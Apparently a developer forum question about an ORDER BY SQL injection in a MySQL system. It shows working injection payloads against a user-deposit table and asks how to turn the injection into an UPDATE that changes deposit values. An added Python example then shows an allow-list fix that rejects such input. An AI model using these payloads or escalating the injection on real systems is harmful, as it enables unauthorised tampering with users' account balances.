I found an ORDER BY-based SQL injection vulnerability in an old system that is under maintenance, and I am preparing to verify it.
I perform this SQL injection first, and it is OK:
<code>SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
select deposit
from sysuser_user_deposit
)end)=1 ASC LIMIT 20 OFFSET 0</code>
But when I execute this SQL with an update statement, I get an error:
<code>SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (select
case
when
(1=1)
then
1
else
(
update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0</code>
Error reported:
<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'update
sysuser_user_deposit
set
deposit=11)end)=1 ASC LIMIT 20 OFFSET 0' at line 9</code>
How can I make it perform the update?
When the main body is select, it cannot be updated, otherwise it cannot be executed.
I have tried this kind of injection in MyBatis. When executing an update in <select>, an error is reported directly and the injection cannot be done.
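
The usual fix for an ORDER BY injection like the one in the question, as an added example that is not part of the original thread: identifiers and sort direction cannot be bound as parameters, so they are mapped through an allow-list while LIMIT and OFFSET are bound. It uses Python with in-memory SQLite as a stand-in for the MySQL system; `build_item_query`, `list_items`, `demo_db` and the sample rows are constructed for illustration.

```python
import sqlite3

# Allow-list: request value -> fixed SQL fragment. Identifiers and ASC/DESC
# cannot be bound as parameters, so only these literals reach ORDER BY.
SORT_COLUMNS = {"item_id": "sysitem_item.item_id"}  # column name from the thread
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_item_query(sort_by, direction="asc", limit=20, offset=0):
    """Return (sql, params); raise ValueError for anything off the allow-list."""
    if not isinstance(sort_by, str) or not isinstance(direction, str):
        raise ValueError("sort parameters must be strings")
    column = SORT_COLUMNS.get(sort_by)
    order = SORT_DIRECTIONS.get(direction.lower())
    if column is None or order is None:
        raise ValueError("unsupported sort parameter")
    limit, offset = int(limit), int(offset)
    if not (1 <= limit <= 100) or offset < 0:
        raise ValueError("limit/offset out of range")
    sql = ("SELECT sysitem_item.item_id FROM sysitem_item "
           f"ORDER BY {column} {order} LIMIT ? OFFSET ?")
    return sql, (limit, offset)


def list_items(conn, sort_by, direction="asc", limit=20, offset=0):
    """Run the listing query and return the item ids in order."""
    sql, params = build_item_query(sort_by, direction, limit, offset)
    return [row[0] for row in conn.execute(sql, params)]


def demo_db():
    """Constructed sample data: in-memory SQLite standing in for MySQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sysitem_item (item_id INTEGER PRIMARY KEY)")
    conn.execute("CREATE TABLE sysuser_user_deposit (deposit INTEGER)")
    conn.executemany("INSERT INTO sysitem_item VALUES (?)", [(3,), (1,), (2,)])
    conn.execute("INSERT INTO sysuser_user_deposit VALUES (5)")
    return conn


if __name__ == "__main__":
    db = demo_db()
    print(list_items(db, "item_id", "desc"))
    try:
        list_items(db, "(select case when (1=1) then 1 else 2 end)=1")
    except ValueError as exc:
        print("rejected:", exc)
```

Because the sort value is only ever used as a dictionary key, an expression such as the one in the question is rejected before any SQL is built.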